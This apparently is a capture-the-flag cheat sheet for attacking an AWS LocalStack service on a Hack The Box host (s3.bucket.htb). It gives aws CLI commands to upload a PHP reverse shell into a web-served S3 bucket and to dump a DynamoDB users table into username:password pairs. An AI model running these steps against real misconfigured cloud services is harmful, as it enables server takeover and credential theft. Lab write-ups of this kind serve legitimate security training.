Skip to content

AWS LocalStack

LocalStack

Test for non-null credentials

  • Configure Creds to not be null with
    aws config
    

Abuse Creds to get shell

  • Login with the newly created creds
    aws --endpoint-url http://s3.bucket.htb ls
    
  • Copy reverse shell to pwd
    aws --endpoint-url http://s3.bucket.htb cp rev.php s3://adserver/
    

Enumerate dynamodb

  • List tables
    aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
    
  • Dump table
    aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users
    
  • Clean table output using jq
    aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[] | "\(.username[]):\(.password[])"'